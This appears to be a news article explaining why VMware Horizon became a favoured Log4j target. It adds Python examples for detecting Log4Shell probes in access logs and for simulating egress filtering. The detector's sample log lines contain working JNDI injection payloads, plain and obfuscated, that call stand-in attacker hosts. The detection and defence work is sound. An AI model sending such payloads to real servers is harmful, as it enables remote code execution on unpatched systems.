Why VMware Horizon Became a ‘Top Choice’ for Log4j Attacks


VMware Horizon has become one of the most popular targets for attackers looking to exploit the vulnerability in Log4j, underscoring the need to update remaining unpatched systems and implement security measures around its use.

For attackers, the virtual desktop platform offers an attractive combination of potential internet accessibility, wide use by wealthy enterprises, and valuable corporate data once in.

Like many VMware products, Horizon uses Apache Log4j, a widely used open source logging software component. That leaves unpatched versions of the product susceptible to the easily exploitable remote code execution vulnerability disclosed on December 9.

Attacker activity

Since the flaw was disclosed, numerous reports have emerged of attackers exploiting vulnerable instances of VMware Horizon, including from Microsoft, CrowdStrike and the UK National Health Service.

The most recent reports came this week, with BlackBerry researchers revealing that they have correlated attacks by an initial access broker group – known as “Prophet Spider” – with exploitation of the Log4j flaw in a VMware Horizon environment. Also in a report this week, Red Canary said it has observed activity from Prophet Spider in connection with a Log4j exploit against Horizon.

Since late December, Red Canary researchers have observed a notable increase in threat actor exploitation of vulnerable VMware Horizon servers. Combined with other reports, this suggests VMware Horizon is “a top choice for adversaries to limit their Log4j targeting,” the Red Canary researchers said.

Cybersecurity executives told VentureBeat this week that VMware Horizon has been attacked so heavily for a combination of reasons, although the attackers also likely took advantage of lax security practices around using the platform.

Remote access

During the pandemic-driven shift to remote work, many companies exposed their VMware Horizon access gateways to the Internet, according to Jimmy Astle, senior director of discovery enablement at Red Canary. This allowed remote employees to reach all of their company resources directly through a web browser.

“As the Horizon access gateways are connected to the remote internet, this may have inadvertently increased the overall exposure to this vulnerability,” Astle said in an email.

The fact that a company is running VMware Horizon in the first place is also a sign that it could be a valuable target for an attacker, he said. Horizon software and the hardware needed to run it don’t come cheap, meaning “the companies using it are typically well-funded and attractive targets,” Astle said.

At the same time, VMware Horizon is widely used by enterprises, another attractive element for attackers, executives said.

In fact, VMware Horizon is “possibly” the most widely used product with both Log4j and strong potential to be Internet-centric, said Jon Gaines, senior application security consultant at nVisium.

Thus, the wide use of VMware Horizon has given threat actors a large pool of possible targets, while also making exploit development more efficient: one exploit works against many victims.

Exploits against a particular vulnerability often need to be tailored to a specific product, “meaning attackers tend to build exploits that can hit the greatest number of targets,” said Yaniv Bar-Dayan, co-founder and CEO of Vulcan Cyber.

‘Rich target’

Meanwhile, the nature of VMware Horizon itself, as a platform for virtual desktops and applications, makes it more attractive still to attackers.

“By compromising the Horizon instance, you can gain access to many virtual desktops and applications,” Gaines said in an email.

Access to multiple applications and virtual desktops “provides threat actors with valuable data,” as well as powerful hardware resources to mine cryptocurrencies, said Davis McCarthy, principal security researcher at Valtix.

With multiple hosts running in a single hypervisor, VMware Horizon is “a rich target by design,” McCarthy said in an email.

There are also good reasons why Horizon seems to be more targeted than other VMware products, many of which also include Log4j. In other VMware products, the vulnerability was not as easy to exploit, requiring multiple steps in some cases, said Matthew Warner, co-founder and chief technology officer at Blumira.

VMware Horizon can be exploited by sending a simple GET request with a specific custom header to any unpatched Horizon server, Warner said in an email. “This resulted in a situation where attackers who would normally perform scans and exploits could quickly add VMware Horizon to their attack patterns.”
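The single-request pattern Warner describes is also what defenders see in gateway or proxy access logs: a JNDI lookup string in a header or path, often obfuscated with nested Log4j lookups or URL encoding. The following detection routine is an added example, not code from the article or from any vendor quoted in it. The log lines are constructed, and the header names and paths in them are assumptions; the article does not say which header the Horizon exploit used. The payload forms (plain `${jndi:...}`, `${lower:}`/`${upper:}` wrappers, `${::-x}` default-value tricks and percent-encoding) are the publicly known Log4Shell variants.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not real traffic). Header names and paths are
# assumptions for illustration; the payloads are well-known Log4Shell forms.
SAMPLE_LINES = [
    '203.0.113.7 "GET / HTTP/1.1" 200 ua="Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 "GET / HTTP/1.1" 200 ua="${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.2 "GET / HTTP/1.1" 200 x-api-version="${${lower:j}${upper:n}di:${lower:r}mi://198.51.100.20:1099/x}"',
    '198.51.100.2 "GET / HTTP/1.1" 200 accept-language="${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://evil.example:389/o}"',
    '192.0.2.5 "GET /%24%7Bjndi%3Adns%3A%2F%2Fx.evil.example%2Fa%7D HTTP/1.1" 404 ua="curl/7.79.1"',
    '192.0.2.9 "GET / HTTP/1.1" 200 ua="${date:yyyy}"',  # a lookup, but not JNDI
]

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
# The thing we are actually looking for, once obfuscation is peeled away.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
CALLBACK = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*://([^/}\s]+)", re.IGNORECASE)


def resolve_inner(body):
    """Evaluate one innermost lookup the way Log4j would; None = leave as is."""
    if ":-" in body:
        # ${name:-default}: assume the lookup (env, sys, ...) fails, so the default wins.
        return body.split(":-", 1)[1]
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    return None


def normalize(text, max_rounds=20):
    """Undo URL encoding and repeatedly collapse nested lookups, innermost first."""
    text = unquote(unquote(text))  # handles single and double percent-encoding
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            resolved = resolve_inner(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def is_log4shell_probe(line):
    """True if the line carries a JNDI lookup after de-obfuscation."""
    return JNDI.search(normalize(line)) is not None


def extract_callback(line):
    """Return (protocol, host[:port]) of the attacker's JNDI server, or None."""
    match = CALLBACK.search(normalize(line))
    if match is None:
        return None
    return match.group(1).lower(), match.group(2)


def scan(lines):
    """(line_no, protocol, callback) for every line with a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        callback = extract_callback(line)
        if callback is not None:
            hits.append((n, callback[0], callback[1]))
        elif is_log4shell_probe(line):
            hits.append((n, None, None))  # JNDI present but callback URL unparsable
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(hit)
```

The callback host and port extracted here are the values to correlate with firewall or proxy egress logs: a matching outbound LDAP, RMI or HTTP connection from the Horizon server is the difference between a scan and a successful exploitation. The scan only sees fields the gateway actually logs, so a header that is not written to the access log will not be caught by this approach.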

Powerful response

For its part, VMware seems to have done what it could so far to respond to the issue, executives told VentureBeat.

The day after the Log4j vulnerability was revealed, VMware released an advisory and began releasing patches and fixes “very quickly,” Bar-Dayan said.

“VMware has done well here in enabling their customer community to update and protect their systems,” he said.

Gaines agreed, saying he was “impressed” by VMware’s response — which he noted included multiple blog posts and regular updates to the Log4j advisory.

McCarthy added that while VMware has provided “timely information about the vulnerability and what is needed to fix it” on its website, “this is not the case for other software vendors.”

In response to reports that attackers have exploited vulnerable Horizon instances, VMware said it was taking the situation surrounding the Log4j vulnerability “very seriously.”

Organizations using on-premises software “must take their own affirmative steps to apply the security patch in their own environment,” the company noted.

“Even with VMware’s security warnings and ongoing efforts to contact customers directly, we continue to see some companies fail to patch,” VMware said in its statement. “VMware Horizon products are vulnerable to critical Apache Log4j/Log4Shell vulnerabilities unless properly patched or mitigated using the information in our security advisory, VMSA-2021-0028, first published December 10, 2021 and regularly updated with new information.”

Customers who have not applied the patch, or the latest fix in the VMware security advisory, “are at risk of being compromised — or may have already been compromised — by threat actors leveraging the Apache Log4Shell vulnerability to actively penetrate unpatched Horizon environments,” said VMware.

VMware also recommends that customers review its FAQ document and join the VMware Security Announcements mailing list to receive future advisories.

Internet-facing

However, Horizon compromises are about more than just unpatched systems, cybersecurity executives told VentureBeat.

Roger Koehler, vice president of threat operations at Huntress, noted that his company’s research (using the Shodan search engine) found approximately 25,000 VMware Horizon servers accessible from the Internet.

“If only 10% of these were vulnerable, that gives an attacker 2,500 Horizon servers to access an environment,” Koehler said in an email.

Executives said they see few situations where a company would have to allow Horizon internet access without additional security measures, such as a VPN and multi-factor authentication.

“There is almost never a situation where VMware Horizon should be internet-facing” without additional security, Warner said.

“If you want to get to something easier remotely, it has to be behind a VPN to do that,” he said.

Another common mistake made when opening up internal resources to the Internet is forgetting to implement outbound filtering rules, Astle said. Egress filtering controls which destinations and ports Internet-facing machines are allowed to reach with outbound network connections, he said.

“This single step would significantly hamper an attacker’s success rate in exploiting this vulnerability,” Astle said.
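Astle's point rests on how Log4Shell works: the vulnerable server must itself open an outbound connection to an attacker-controlled LDAP or RMI server to complete the JNDI lookup, and on older JDKs it then fetches a class over HTTP as well. A default-deny egress policy on the Horizon gateway breaks that chain even when the server is unpatched. The following simulation is an added example, not code or configuration from the article or from VMware. The allow-list entries (internal Connection Server subnet, internal resolvers, internal NTP) and the observed flows are hypothetical and constructed; a real gateway will need whatever outbound destinations its deployment actually uses, which is why the example also lists the flows a proposed policy would break before it is enforced.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    action: str                       # "allow" or "deny"
    dst_net: str                      # destination CIDR
    proto: str                        # "tcp", "udp" or "any"
    ports: Optional[Tuple[int, int]]  # inclusive port range, None = any port

    def matches(self, dst_ip: str, proto: str, port: int) -> bool:
        if self.proto not in ("any", proto):
            return False
        if self.ports is not None and not (self.ports[0] <= port <= self.ports[1]):
            return False
        return ipaddress.ip_address(dst_ip) in ipaddress.ip_network(self.dst_net)


# Hypothetical allow-list for an Internet-facing Horizon gateway (first match wins).
# The subnets and ports are assumptions for this example, not VMware guidance.
DEFAULT_DENY_POLICY: List[Rule] = [
    Rule("allow", "10.0.10.0/24", "tcp", (443, 443)),  # assumed: internal Connection Servers
    Rule("allow", "10.0.53.0/24", "udp", (53, 53)),    # assumed: internal DNS resolvers only
    Rule("allow", "10.0.123.5/32", "udp", (123, 123)),  # assumed: internal NTP
    Rule("deny", "0.0.0.0/0", "any", None),            # everything else, including the Internet
]

# The common mistake Astle describes: no outbound filtering at all.
OPEN_POLICY: List[Rule] = [Rule("allow", "0.0.0.0/0", "any", None)]

# Constructed outbound flows "observed" from the gateway before enforcing the policy.
OBSERVED_FLOWS = [  # (dst_ip, proto, port, label)
    ("10.0.10.5", "tcp", 443, "Connection Server"),
    ("10.0.53.2", "udp", 53, "internal DNS"),
    ("203.0.113.9", "tcp", 1389, "unknown: JNDI callback seen in access log"),
    ("198.51.100.20", "tcp", 80, "unknown: class fetch"),
]


def egress_allowed(policy: List[Rule], dst_ip: str, proto: str, port: int) -> bool:
    """First-match evaluation; implicit deny if no rule matches."""
    for rule in policy:
        if rule.matches(dst_ip, proto, port):
            return rule.action == "allow"
    return False


def log4shell_chain_outcome(policy: List[Rule], callback_ip: str, callback_port: int,
                            class_ip: str, class_port: int = 80) -> str:
    """Where, if anywhere, the policy stops the outbound half of a Log4Shell attack."""
    # Stage 1: the JNDI lookup itself, to the attacker's LDAP/RMI server. Always required.
    if not egress_allowed(policy, callback_ip, "tcp", callback_port):
        return "blocked at JNDI lookup"
    # Stage 2: remote class download over HTTP (older JDKs); gadget-chain variants skip this.
    if not egress_allowed(policy, class_ip, "tcp", class_port):
        return "blocked at class fetch"
    return "exploit chain completes"


def flows_denied(policy: List[Rule], flows) -> List[str]:
    """Labels of observed flows the policy would cut off; review before enforcing."""
    return [label for ip, proto, port, label in flows
            if not egress_allowed(policy, ip, proto, port)]


if __name__ == "__main__":
    for name, policy in (("default-deny", DEFAULT_DENY_POLICY), ("open", OPEN_POLICY)):
        print(name, log4shell_chain_outcome(policy, "203.0.113.9", 1389, "198.51.100.20"))
        print("  would deny:", flows_denied(policy, OBSERVED_FLOWS))
```

One caveat the simulation makes visible: the allow-listed internal resolver still forwards DNS queries, so a `${jndi:dns://...}` payload can leak data through it even under default-deny egress. That variant cannot deliver remote code execution, so the LDAP and RMI callbacks are the ones that matter for the compromise Astle describes, but DNS logs from the internal resolver remain worth monitoring.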

Patching, of course, remains crucial. While other security measures can help lower the risk of using Internet-accessible software, they are not a substitute for completely eliminating the vulnerability, executives said.

“The biggest recommendation for VMware Horizon administrators is to follow VMware’s advice and ensure that their systems are patched,” said Koehler.

